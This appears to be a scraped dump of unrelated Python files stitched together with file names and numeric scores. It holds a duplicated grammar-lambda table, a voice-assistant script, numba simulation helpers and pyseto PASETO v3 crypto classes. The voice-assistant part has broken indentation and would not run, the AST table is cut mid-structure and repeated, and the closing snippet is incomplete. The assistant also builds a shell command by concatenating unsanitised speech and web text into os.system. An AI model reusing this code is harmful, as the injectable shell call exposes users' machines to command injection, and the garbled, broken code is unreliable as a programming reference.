lambda r: [lambda s="": [r[0] + ": Input String", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Input Number", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Input", EvaluateFunctionOrList(r[1], s)]],
lambda r: [lambda s="": [r[0] + ": Evaluate", r[1][0](s)]],
lambda r: [lambda s="": ["Print"] + [el[0](s) for el in r]],
lambda r: [lambda s="": ["Print"] + [el[0](s) for el in r]],
lambda r: [lambda s="": [r[0] + ": Multiprint"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Multiprint"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Hollow Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Hollow Polygon"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rectangle"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rectangle"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Oblong"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Oblong"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Box"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Box"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": ["Move"] + [el[0](s) for el in r]],
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Jump"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Pivot Left", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Left"]],
lambda r: [lambda s="": [r[0] + ": Pivot Right", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Right"]],
lambda r: [lambda s="": [r[0] + ": Jump to"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"]]
] +
[lambda r: [lambda s="": [r[0] + ": Reflect transform"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate prism"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect mirror"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate copy"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect copy"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Rotate overlap overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate overlap"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Rotate shutter overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate shutter"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Reflect overlap overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect overlap"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Reflect butterfly overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect butterfly"] + [el[0](s) for el in r[1:]]]] * 3 +
[
lambda r: [lambda s="": [r[0] + ": Rotate"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate"]],
lambda r: [lambda s="": [r[0] + ": Reflect"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Reflect"]],
lambda r: [lambda s="": [r[0] + ": Copy"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": For (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": While (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] +[el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Assign at index"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign", r[1][0](s)] + [el(t) for el in r[2:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign"] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Fill"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": SetBackground", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Dump"]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh for (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh while (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Refresh", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Refresh"]],
lambda r: [lambda s="": [r[0] + ": Toggle trim"]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Clear"]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Push"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Map assign left", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign right", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": exec"] + [el[0](s) for el in r[1:]]]
]
} | astprocessor.py |
lambda r: [lambda s="": [r[0] + ": Move"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Jump"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Pivot Left", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Left"]],
lambda r: [lambda s="": [r[0] + ": Pivot Right", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Pivot Right"]],
lambda r: [lambda s="": [r[0] + ": Jump to"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate transform"]]
] +
[lambda r: [lambda s="": [r[0] + ": Reflect transform"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate prism"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect mirror"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Rotate copy"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Reflect copy"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Rotate overlap overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate overlap"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Rotate shutter overlap"
] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [r[0] + ": Rotate shutter"] + [EvaluateFunctionOrList(el, s) for el in r[1:]]]] * 6 +
[lambda r: [lambda s="": [
r[0] + ": Reflect overlap overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect overlap"] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [
r[0] + ": Reflect butterfly overlap"
] + [el[0](s) for el in r[1:]]]] * 3 +
[lambda r: [lambda s="": [r[0] + ": Reflect butterfly"] + [el[0](s) for el in r[1:]]]] * 3 +
[
lambda r: [lambda s="": [r[0] + ": Rotate"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Rotate"]],
lambda r: [lambda s="": [r[0] + ": Reflect"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Reflect"]],
lambda r: [lambda s="": [r[0] + ": Copy"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": For (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": While (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] +[el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": If", r[1][0](s)] + [el[0](s)[0](s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Assign at index"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign", r[1][0](s)] + [el(t) for el in r[2:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Assign"] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Fill"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": SetBackground", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Dump"]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh for (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": (lambda t: [r[0] + ": Refresh while (loop variable %s (%s))" % (t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:-1]] + [r[-1][0](t)[0](t)])(s + GetFreeVariable(s))],
lambda r: [lambda s="": [r[0] + ": Refresh", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Refresh"]],
lambda r: [lambda s="": [r[0] + ": Toggle trim"]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Crop", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Clear"]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s), r[2][0](s)]],
lambda r: [lambda s="": [r[0] + ": Extend", r[1][0](s)]],
lambda r: [lambda s="": [r[0] + ": Push"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Switch"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": (lambda t: [r[0] + ": Map (loop variable %s (%s), index variable %s (%s))" % (t[-2], VerbosifyVariable(t[-2]), t[-1], VerbosifyVariable(t[-1]))] + [el[0](t) for el in r[1:]])(s + GetFreeVariable(s, 2))],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Execute variable"] + [el[0](s) for el in r[1:]]],
lambda r: [lambda s="": [r[0] + ": Map assign left", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign right", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": Map assign", r[1][0](s)] + [EvaluateFunctionOrList(el, s) for el in r[2:]]],
lambda r: [lambda s="": [r[0] + ": exec"] + [el[0](s) for el in r[1:]]]
]
} | 0.451085 | 0.531331 |
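# Minimal sketch of the two-stage lambda convention used in the tables
# above (my reconstruction of the pattern, not code from the project):
# each grammar rule maps its already-processed children r to a list
# holding a deferred renderer; calling that renderer with the current
# variable scope s produces the annotated output line.
rule = lambda r: [lambda s="": r[0] + ": Sum"]
deferred = rule(["Plus"])[0]  # stage 1: bind the children
print(deferred())             # stage 2: render -> "Plus: Sum"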
from gtts import gTTS
import speech_recognition as sr
import os
import re
import webbrowser
import smtplib
import requests
from weather import Weather
def talkToMe(audio):
"""speaks audio passed as argument"""
print(audio)
    for line in audio.splitlines():
        os.system("echo " + line)
    # synthesize speech with gTTS and play the mp3 with the system's default player
    text_to_speech = gTTS(text=audio, lang='en')
    text_to_speech.save('audio.mp3')
    os.system('start audio.mp3')
def myCommand():
"""listens for commands"""
r = sr.Recognizer()
with sr.Microphone() as source:
print('Ready...')
r.pause_threshold = 1
r.adjust_for_ambient_noise(source, duration=1)
audio = r.listen(source)
try:
command = r.recognize_google(audio).lower()
print('You said: ' + command + '\n')
# loop back to continue to listen for commands if unrecognizable speech is received
except sr.UnknownValueError:
print('Your last command couldn\'t be heard')
command = myCommand()
return command
def assistant(command):
"""if statements for executing commands"""
if 'open reddit' in command:
reg_ex = re.search('open reddit (.*)', command)
url = 'https://www.reddit.com/'
if reg_ex:
subreddit = reg_ex.group(1)
url = url + 'r/' + subreddit
webbrowser.open(url)
print('Done!')
elif 'open website' in command:
reg_ex = re.search('open website (.+)', command)
if reg_ex:
domain = reg_ex.group(1)
url = 'https://www.' + domain
webbrowser.open(url)
print('Done!')
else:
pass
elif 'what\'s up' in command:
talkToMe('Just doing my thing')
elif 'joke' in command:
res = requests.get(
'https://icanhazdadjoke.com/',
headers={"Accept": "application/json"}
)
if res.status_code == requests.codes.ok:
talkToMe(str(res.json()['joke']))
else:
            talkToMe('Oops! I ran out of jokes.')
elif 'current weather in' in command:
reg_ex = re.search('current weather in (.*)', command)
if reg_ex:
city = reg_ex.group(1)
weather = Weather()
location = weather.lookup_by_location(city)
condition = location.condition()
            talkToMe('The current weather in %s is %s. The temperature is %.1f degrees.' % (
                city, condition.text(), (int(condition.temp()) - 32) / 1.8))
elif 'weather forecast in' in command:
reg_ex = re.search('weather forecast in (.*)', command)
if reg_ex:
city = reg_ex.group(1)
weather = Weather()
location = weather.lookup_by_location(city)
forecasts = location.forecast()
for i in range(0, 3):
                talkToMe('On %s it will be %s. The maximum temperature will be %.1f degrees. '
                         'The lowest temperature will be %.1f degrees.' % (
                    forecasts[i].date(), forecasts[i].text(), (int(forecasts[i].high()) - 32) / 1.8,
                    (int(forecasts[i].low()) - 32) / 1.8))
elif 'email' in command:
talkToMe('Who is the recipient?')
recipient = myCommand()
if 'Jarvis' in recipient:
talkToMe('What should I say?')
content = myCommand()
# init gmail SMTP
mail = smtplib.SMTP('smtp.gmail.com', 587)
# identify to server
mail.ehlo()
# encrypt session
mail.starttls()
# login
mail.login('username', 'password')
# send message
mail.sendmail('<NAME>', '<EMAIL>', content)
# end mail connection
mail.close()
talkToMe('Email sent.')
else:
talkToMe('I don\'t know what you mean!')
talkToMe('I am ready for your command')
# loop to continue executing multiple commands
while True:
    assistant(myCommand()) | jarvis.py | 0.234056 | 0.076408
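# Minimal sketch of the regex dispatch pattern assistant() relies on above
# (the command string is made up; re is the only dependency):
import re

command = 'open reddit learnpython'
match = re.search('open reddit (.*)', command)
if match:
    print('https://www.reddit.com/r/' + match.group(1))
# -> https://www.reddit.com/r/learnpython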
import numpy as np
from numba import jit
from numba.extending import overload
def moving_average(x, w):
print("moving_av")
return np.convolve(x, np.ones(w), "valid") / w
@jit(nopython=True)
def calculate_age(array):
ret = np.zeros(array.shape)
for i in range(array.shape[0]):
count = 0
for j in range(array.shape[1]):
count += 1
if array[i, j]:
count = 0
ret[i, j] = 0
continue
ret[i, j] = count
return ret
calculate_age(np.array([[0]]))
@jit(nopython=True)
def replace_NaN(array):
prev_value = np.zeros(array.shape[1])
for i in range(len(array)):
if np.isnan(array[i, 0]):
array[i] = prev_value
else:
prev_value = array[i]
return array
def calculate_mt(M, spikes):
m_t = np.copy(M)
mask = spikes == 0
    m_t[mask] = np.nan
m_t = np.nanmean(m_t, axis=1)
m_t = replace_NaN(m_t)
return m_t
def calculate_nt(m_t):
return np.einsum("ai,aj->aij", m_t, m_t)
calculate_mt(np.zeros((10, 5, 2)), np.zeros((10, 5)))
@jit(nopython=True, nogil=True)
def f_SRM(x, c=1, Delta=1, theta=0):
return np.exp(x / Delta) * c
@jit(nopython=True)
def eta_SRM(x, Gamma, Lambda, tau=1):
ret = np.zeros(len(x))
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def eta_SRM_no_vector(x, Gamma, Lambda, tau=1):
ret = 0
for d in range(len(Gamma)):
ret += Gamma[d] * np.exp(-Lambda[d] * x)
return ret
@jit(nopython=True)
def kappa_interaction(t, lambda_kappa, strength):
return strength * np.exp(-lambda_kappa * t)
def h_exp_update(h_t, A_t, I_ext, lambda_kappa, dt, J):
return h_t + lambda_kappa * dt * (J * A_t + I_ext - h_t)
def h_erlang_update(h_t, k_t, A_t, I_ext, lambda_kappa, dt, J):
h = h_t + dt * lambda_kappa * (-h_t + k_t)
k = k_t + dt * lambda_kappa * (-k_t + J * A_t + I_ext)
return h, k
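# Usage sketch (made-up numbers): one explicit-Euler step of the
# exponentially filtered drive, h' = h + lambda_kappa * dt * (J*A + I - h):
#     h_exp_update(h_t=0.0, A_t=1.5, I_ext=0.2, lambda_kappa=1.0, dt=0.01, J=2.0)
#     -> 0.0 + 1.0 * 0.01 * (2.0 * 1.5 + 0.2 - 0.0) = 0.032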
@overload(np.clip)
def np_clip(a, a_min, a_max, out=None):
def np_clip_impl(a, a_min, a_max, out=None):
if out is None:
out = np.empty_like(a)
for i in range(len(a)):
if a[i] < a_min:
out[i] = a_min
elif a[i] > a_max:
out[i] = a_max
else:
out[i] = a[i]
return out
    return np_clip_impl | src/flowrect/simulations/util.py | 0.270962 | 0.563918
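# Usage sketch for the @overload(np.clip) registration above (assuming the
# module above has been imported so np_clip_impl is registered, and a Numba
# version without built-in np.clip support, which is the gap the overload
# fills): inside nopython mode, np.clip on a 1-D array dispatches to it.
import numpy as np
from numba import jit

@jit(nopython=True)
def clip_demo(a):
    return np.clip(a, 0.0, 1.0)  # resolved via the registered overload

print(clip_demo(np.array([-0.5, 0.3, 1.7])))  # [0.  0.3 1. ]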
import hashlib
import hmac
from secrets import token_bytes
from typing import Any, Union
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.asymmetric.ec import (
EllipticCurvePrivateKey,
EllipticCurvePublicKey,
)
from cryptography.hazmat.primitives.asymmetric.utils import (
decode_dss_signature,
encode_dss_signature,
)
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from ..exceptions import DecryptError, EncryptError, SignError, VerifyError
from ..key_interface import KeyInterface
from ..key_nist import NISTKey
from ..utils import (
base64url_decode,
base64url_encode,
ec_public_key_compress,
i2osp,
os2ip,
pae,
)
class V3Local(NISTKey):
"""
The key object for v3.local.
"""
_VERSION = 3
_TYPE = "local"
def __init__(self, key: Union[str, bytes]):
super().__init__(key)
return
def encrypt(
self,
payload: bytes,
footer: bytes = b"",
implicit_assertion: bytes = b"",
nonce: bytes = b"",
) -> bytes:
if nonce:
if len(nonce) != 32:
raise ValueError("nonce must be 32 bytes long.")
else:
nonce = token_bytes(32)
e = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-encryption-key" + nonce,
)
a = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-auth-key-for-aead" + nonce,
)
try:
tmp = e.derive(self._key)
ek = tmp[0:32]
n2 = tmp[32:]
ak = a.derive(self._key)
except Exception as err:
raise DecryptError("Failed to derive keys.") from err
c = self._encrypt(ek, n2, payload)
pre_auth = pae([self.header, nonce, c, footer, implicit_assertion])
t = hmac.new(ak, pre_auth, hashlib.sha384).digest()
token = self._header + base64url_encode(nonce + c + t)
if footer:
token += b"." + base64url_encode(footer)
return token
def decrypt(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b"") -> bytes:
n = payload[0:32]
c = payload[32 : len(payload) - 48]
t = payload[-48:]
e = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-encryption-key" + n,
)
a = HKDF(
algorithm=hashes.SHA384(),
length=48,
salt=None,
info=b"paseto-auth-key-for-aead" + n,
)
try:
tmp = e.derive(self._key)
ek = tmp[0:32]
n2 = tmp[32:]
ak = a.derive(self._key)
except Exception as err:
raise DecryptError("Failed to derive keys.") from err
pre_auth = pae([self.header, n, c, footer, implicit_assertion])
t2 = hmac.new(ak, pre_auth, hashlib.sha384).digest()
if t != t2:
raise DecryptError("Failed to decrypt.")
return self._decrypt(ek, n2, c)
def to_paserk_id(self) -> str:
h = "k3.lid."
p = self.to_paserk()
digest = hashes.Hash(hashes.SHA384())
digest.update((h + p).encode("utf-8"))
d = digest.finalize()
return h + base64url_encode(d[0:33]).decode("utf-8")
class V3Public(NISTKey):
"""
The key object for v3.public.
"""
_VERSION = 3
_TYPE = "public"
def __init__(self, key: Any):
super().__init__(key)
self._sig_size = 96
if not isinstance(self._key, (EllipticCurvePublicKey, EllipticCurvePrivateKey)):
raise ValueError("The key is not ECDSA key.")
if isinstance(self._key, EllipticCurvePublicKey):
self._is_secret = False
return
@classmethod
def from_public_bytes(cls, key: bytes):
try:
k = EllipticCurvePublicKey.from_encoded_point(ec.SECP384R1(), key)
except Exception as err:
raise ValueError("Invalid bytes for the key.") from err
return cls(k)
@classmethod
def from_paserk(
cls,
paserk: str,
wrapping_key: bytes = b"",
password: bytes = b"",
unsealing_key: bytes = b"",
) -> KeyInterface:
if wrapping_key and password:
raise ValueError("Only one of wrapping_key or password should be specified.")
frags = paserk.split(".")
if frags[0] != "k3":
raise ValueError(f"Invalid PASERK version: {frags[0]}.")
if wrapping_key:
# secret-wrap
if len(frags) != 4:
raise ValueError("Invalid PASERK format.")
if frags[2] != "pie":
raise ValueError(f"Unknown wrapping algorithm: {frags[2]}.")
if frags[1] == "secret-wrap":
h = "k3.secret-wrap.pie."
k = cls._decode_pie(h, wrapping_key, frags[3])
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
if len(frags) != 3:
raise ValueError("Invalid PASERK format.")
if password:
# secret-pw
if frags[1] == "secret-pw":
h = "k3.secret-pw."
k = cls._decode_pbkw(h, password, frags[2])
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
# public
k = base64url_decode(frags[2])
if frags[1] == "public":
pub = EllipticCurvePublicKey.from_encoded_point(ec.SECP384R1(), k)
return cls(pub)
# secret
if frags[1] == "secret":
priv = ec.derive_private_key(int.from_bytes(k, byteorder="big"), ec.SECP384R1())
return cls(priv)
if frags[1] == "secret-wrap":
raise ValueError(f"{frags[1]} needs wrapping_key.")
raise ValueError(f"Invalid PASERK type: {frags[1]}.")
def to_paserk(
self,
wrapping_key: Union[bytes, str] = b"",
password: Union[bytes, str] = b"",
sealing_key: Union[bytes, str] = b"",
iteration: int = 100000,
memory_cost: int = 15 * 1024,
time_cost: int = 2,
parallelism: int = 1,
) -> str:
if wrapping_key and password:
raise ValueError("Only one of wrapping_key or password should be specified.")
if wrapping_key:
# secret-wrap
if not isinstance(self._key, EllipticCurvePrivateKey):
raise ValueError("Public key cannot be wrapped.")
bkey = wrapping_key if isinstance(wrapping_key, bytes) else wrapping_key.encode("utf-8")
h = "k3.secret-wrap.pie."
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return h + self._encode_pie(h, bkey, k)
if password:
# secret-pw
if not isinstance(self._key, EllipticCurvePrivateKey):
raise ValueError("Public key cannot be wrapped.")
bpw = password if isinstance(password, bytes) else password.encode("utf-8")
h = "k3.secret-pw."
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return h + self._encode_pbkw(h, bpw, k, iteration)
# public
if isinstance(self._key, EllipticCurvePublicKey):
k = ec_public_key_compress(self._key.public_numbers().x, self._key.public_numbers().y)
return "k3.public." + base64url_encode(k).decode("utf-8")
# private
k = self._key.private_numbers().private_value.to_bytes(48, byteorder="big")
return "k3.secret." + base64url_encode(k).decode("utf-8")
def to_paserk_id(self) -> str:
p = self.to_paserk()
h = "k3.pid." if isinstance(self._key, EllipticCurvePublicKey) else "k3.sid."
digest = hashes.Hash(hashes.SHA384())
digest.update((h + p).encode("utf-8"))
d = digest.finalize()
return h + base64url_encode(d[0:33]).decode("utf-8")
def sign(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b"") -> bytes:
if isinstance(self._key, EllipticCurvePublicKey):
raise ValueError("A public key cannot be used for signing.")
pk = ec_public_key_compress(
self._key.private_numbers().public_numbers.x,
self._key.private_numbers().public_numbers.y,
)
m2 = pae([pk, self.header, payload, footer, implicit_assertion])
try:
sig = self._key.sign(m2, ec.ECDSA(hashes.SHA384()))
return self._der_to_os(self._key.curve.key_size, sig)
except Exception as err:
raise SignError("Failed to sign.") from err
def verify(self, payload: bytes, footer: bytes = b"", implicit_assertion: bytes = b""):
if len(payload) <= self._sig_size:
raise ValueError("Invalid payload.")
sig = payload[-self._sig_size :]
m = payload[: len(payload) - self._sig_size]
k = self._key if isinstance(self._key, EllipticCurvePublicKey) else self._key.public_key()
pk = ec_public_key_compress(k.public_numbers().x, k.public_numbers().y)
m2 = pae([pk, self.header, m, footer, implicit_assertion])
try:
der_sig = self._os_to_der(self._key.curve.key_size, sig)
k.verify(der_sig, m2, ec.ECDSA(hashes.SHA384()))
except Exception as err:
raise VerifyError("Failed to verify.") from err
return m
def _der_to_os(self, key_size: int, sig: bytes) -> bytes:
num_bytes = (key_size + 7) // 8
r, s = decode_dss_signature(sig)
return i2osp(r, num_bytes) + i2osp(s, num_bytes)
def _os_to_der(self, key_size: int, sig: bytes) -> bytes:
num_bytes = (key_size + 7) // 8
if len(sig) != 2 * num_bytes:
raise ValueError("Invalid signature.")
r = os2ip(sig[:num_bytes])
s = os2ip(sig[num_bytes:])
        return encode_dss_signature(r, s) | pyseto/versions/v3.py | 0.76708 | 0.27036
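# Usage sketch for the classes above (not from the pyseto docs; direct
# construction is assumed, which from_paserk itself relies on when it
# calls cls(priv)). decrypt() takes the base64url-decoded token body,
# since header parsing happens at a higher level in the library.
import base64
from secrets import token_bytes
from cryptography.hazmat.primitives.asymmetric import ec

def b64url_decode(v: bytes) -> bytes:
    return base64.urlsafe_b64decode(v + b"=" * (-len(v) % 4))

k = V3Local(token_bytes(32))
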